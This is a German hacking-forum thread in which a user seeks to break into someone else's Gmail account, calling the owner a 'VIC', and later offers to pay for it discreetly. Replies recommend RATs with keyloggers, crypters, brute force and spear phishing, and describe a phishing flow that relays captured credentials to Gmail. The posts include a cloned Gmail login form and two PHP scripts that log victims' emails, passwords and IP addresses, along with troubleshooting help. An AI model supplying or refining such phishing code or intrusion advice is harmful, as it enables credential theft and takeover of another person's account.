18 Antworten in diesem Thema

[seiko]

Guten Abend!

Ich bin neu hier und totaler Anfäger. Aber irgendwann muss man ja mal beginnen. Also ich möchte an das Passwort eines gmail-accounts rankommen. Welches tool sollte ich dafür verwenden? Eine kleine Anleitung und Tipps gegen Anfängerfehler sind natürlich sehr willkommen. Natürlich werd ich zuerst nur an meinen herumprobieren. Danke schon mal!

[KrankenHaus]

Bruteforce könntest du versuchen oder mit ein stealer dein opfer zu Stealen

[smc2014]

Da du evtl. nicht weisst, ob der baldige VIC überhaupt Daten abspeichert.... (ein Stealer kann nur abgespeicherte Daten "stealen" ) würde ich dir ein RAT empfehlen.

Bevor die nächste Frage kommt, welches oder wo finde ich eines http://www.toolbase.....php/pages/baseklicke oben auf RAT.

 

• CyberGate
• Pandora

 

werden am häufigsten benutzt.

Beide haben ein integrierten KeyLogger, d.h. es werden alle Tastatureinschläge aufgenommen (auch Offline).

Probier es mal in einer VM aus.

 

PS: wenn du es anderswo benutzen möchtest, denke daran das du eine "feste IP" brauchst.. hierzu

Please Login HERE or Register HERE to see this link!

 

HF =Have Fun

[B1nary]

Falls dein Vic schwer zu infecten ist, tut's vielleicht auch eine Phishing-Page. Bei Gmail funktioniert auch ein true login via PHP CURL

[FalkE]

spear phishing

[seiko]

Danke mal an alle für die Antworten.

Welches tool für bruteforce sollte ich verwenden?

Ich geh davon aus, dass das Passwort abgespeichert ist. Verwendet wird gmail über ein Iphone 5.

Gibt es da auch ein tool für Handys?

Phishing bekomme ich vielleicht hin mit den Anleitungen im Netz. 

Was ist true login via PHP CURL?

Entschuldigung für die laienhaften Fragen!

[Cube]

 

Welches tool für bruteforce sollte ich verwenden?

Ich geh davon aus, dass das Passwort abgespeichert ist. Verwendet wird gmail über ein Iphone 5.

Gibt es da auch ein tool für Handys?

 

Bruteforce würde ich persönlich sein lassen.

Bruteforce gegen google? Und dann auch noch als absoluter Frischling?

Man muss zuerst gehen lernen bevor man laufen kann

 

Das Passwort von einem Smartphone auszulesen ist schon eine deutlich höherer aufwand als von einem PC.

Es gibt Trojaner/Rats für Smartphones, allerdings sind mir persönlich nur welche für Android bekannt.

 

Bin noch nicht über Apple Iphone Rats gestolpert.

Vielleicht kennt allerdings jemanden der eines anbietet.

Allerdings gehe ich dann davon aus, dass das nicht gerade billig sein wird.

Aber auch ich bin nicht all wissend.

 

Deutlich einfacher wäre es, wenn du den Vic PC irgendwie angreifen könntest, in welcher Form auch immer.

 

Lg

Cube

[seiko]

 

Allerdings gehe ich dann davon aus, dass das nicht gerade billig sein wird.

 

Eine finanzielle Gegenleistung kann ich natürlich anbieten, wenn sie sich im Rahmen hält und nicht überzogen ist.

[B1nary]

Was ist true login via PHP CURL?

Entschuldigung für die laienhaften Fragen!

 

Kein Problem, dafür ist ein Forum da!

PHP Libcurl ist eine Bibliothek, welche die Verbindung zu Servern (Websites) ermöglicht und somit Protokolle ausgetauscht werden können

Quelle: 

Please Login HERE or Register HERE to see this link!

 

Damit kannst du z.B. einen Login durchführen. Du generierst mit deiner Phishing-Page alle notwendigen Daten (Header, Cookie/Session, etc.) und kannst dich so einloggen (API, OAuth).

 

Phishing-Page -> Daten werden eingegeben -> Daten werden gespeichert/protokolliert -> cURL Request an Gmail mit den eingegebenen Daten -> Login erfolgt  (Vic bekommt i.d.R. nicht mit, dass er abgephished wurde, da der Login vollzogen wurde (true login)) -> Cookie setzen -> Weiterleitung zu Gmail / Refresh

[seiko]

Also ich will es mit der Phishing-methode probieren. Ich hab mich an dem Tutorial 

http://www.toolbase.bz/board/topic/300-tut-phishing-tutorial-by-paulaabdul-1/

orientiert.

Allerdings steh ich schon am Anfang an. Zuerst der interessante Teil der gmail.html, die ich abgespeichert hab:

 

 

<form novalidate="" method="post" action="login.php" id="gaia_loginform">
  <input name="GALX" type="hidden" value="MlTgl6VfDaE">
  <input name="continue" type="hidden" value="

Please Login HERE or Register HERE to see this link!

  <input name="service" type="hidden" value="mail">
  <input name="hl" type="hidden" value="en">
  <input type="hidden" id="_utf8" name="_utf8" value="☃">
  <input type="hidden" name="bgresponse" id="bgresponse" value="js_disabled">
  <input type="hidden" id="pstMsg" name="pstMsg" value="1">
  <input type="hidden" id="dnConn" name="dnConn" value="">
  <input type="hidden" id="checkConnection" name="checkConnection" value="youtube:128:1">
  <input type="hidden" id="checkedDomains" name="checkedDomains" value="youtube">
<label class="hidden-label" for="Email">Email</label>
<input id="Email" name="Email" type="email" placeholder="Email" value="" spellcheck="false" class="">
<label class="hidden-label" for="Passwd">Password</label>
<input id="Passwd" name="Passwd" type="password" placeholder="Password" class="">
<input id="signIn" name="signIn" class="rc-button rc-button-submit" type="submit" value="Sign in">

 

 

Dann hab ich die Datei login.php erstellet. Die schaut so aus:

 

<?php
$go = fopen("logs","a+");
$timestamp = time();
$datum = date("d.m.Y - H:i:s", $timestamp);
$mail = $_POST["Email"];
$pass = $_POST["Passwd"];
$ip = $_SERVER['REMOTE_ADDR'];
fwrite($go, "Hoster: Google");
fwrite($go, "Datum: " . "$datum n");
fwrite($go, "E-Mail: " . "$mail n");
fwrite($go, "Password: " . "$pass n");
fwrite($go, "Ip: " . "$ip n");
fwrite($go, " n");
fclose($go);
header('Location:

Please Login HERE or Register HERE to see this link!

?>

 

Wenn ich also gmail aufrufe, email und Passwort eingebe und auf sign-in klick, tut sich nur eine leere login.php Seite auf.

Was hab ich falsch gemacht?

[B1nary]

Wird denn die Datei logs geschrieben?

[seiko]

Nein.

[B1nary]

<?php
$fp = fopen('logs.txt', 'a+');
$email = $_POST['Email'];
$passwd = $_POST['Passwd'];
$ip = getenv('REMOTE_ADDR');
if (!empty($email) && !empty($passwd)):
	$str = 'Hoster: Google\nDatum: '.date('d.m.Y - H:i:s', time()).'\nE-Mail: '.$email.'\nPasswort: '.$passwd.'\nIP: '.$ip.'\n\n';
	fwrite($fp, trim($str));
	fclose($fp);
endif;
header('Location: google.com');
?>

Ungetestet

[seiko]

Danke!! Ich werd's ausprobieren wenn ich von der Arbeit komm.

[seiko]

Leider das gleiche Ergebnis. Es kommt eine leere login.php Seite und die Datei logs wird nicht geschrieben.

[adramax]

Hast du den CHMOD Rechte vergeben?

 

Wenn die login.php keine Rechte hat in die Datei logs zu schreiben, kann sie dort auch nicht rein schreiben.

 

Aber hab nochmal ne Frage, geht es dir um einen Gmail Account oder darum etwas zu lernen?

Wenn du etwas lernen willst, ist das vermutlich der falsche Weg, dann solltest du dir Bücher kaufen oder im Internet nach E-Books über PHP suchen.

[C.I.K]

Da du evtl. nicht weisst, ob der baldige VIC überhaupt Daten abspeichert.... (ein Stealer kann nur abgespeicherte Daten "stealen" ) würde ich dir ein RAT empfehlen.

Bevor die nächste Frage kommt, welches oder wo finde ich eines http://www.toolbase.....php/pages/baseklicke oben auf RAT.

 

• CyberGate
• Pandora

 

werden am häufigsten benutzt.

Beide haben ein integrierten KeyLogger, d.h. es werden alle Tastatureinschläge aufgenommen (auch Offline).

Probier es mal in einer VM aus.

 

PS: wenn du es anderswo benutzen möchtest, denke daran das du eine "feste IP" brauchst.. hierzu

Please Login HERE or Register HERE to see this link!

 

HF =Have Fun

Dieser User hat dir eingentlich alles geliefert was du brauchst.

Was noch fehlt ist ein Crypter und kannst es versuchen.

Wird das leichtest sein.

[seiko]

Der VIC verwendet gmail über ein iPhone. Ein User hat erwähnt, dass es keinen RAT gibt für iPhone.

 

Primär geht es mir natürlich um den account. Wenn ich aber nebenbei was dazu lerne, ist es ja auch nicht verkehrt.

[seiko]

Ich meld mich nochmal. Also ich geb's auf. Gibt es jemandem, der sich das zutraut.

Ich würde natürlich dafür bezahlen, wenn's nicht zu unverschämt ist.

Voraussetzung ist natürlich DISKRETION!